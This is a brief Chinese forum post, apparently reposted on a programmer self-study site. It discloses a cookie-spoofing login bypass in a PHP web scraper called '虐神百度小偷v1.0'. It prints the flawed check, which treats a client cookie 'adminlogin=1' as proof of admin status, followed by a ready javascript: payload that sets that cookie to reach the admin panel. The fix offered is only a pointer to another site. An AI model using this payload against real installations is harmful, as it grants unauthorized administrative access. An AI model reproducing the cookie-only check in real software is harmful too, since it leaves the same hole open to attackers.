Team:t00ls Author: wming79 虐神百度小偷v1.0 cookie欺骗
本想发布歪酷CMS漏洞 怎么知道cond0r抢先发布了,为了版主他真的豁出去了! 在这里祝他成功!
此洞有点2... 毕竟是洞~ 让作者知道下也好. <?php if(isset($_COOKIE['adminlogin']) && $_COOKIE['adminlogin']=="1")//你懂的... Header("Location: main.php"); else Header("Location: login.php"); ?> javascript:alert(document.cookie="adminlogin="+escape("1"));
修复:参加本站 www.2cto.com 以前文章
查看更多关于虐神百度小偷v1.0 cookie欺骗及修复 - 网站安全 -的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12866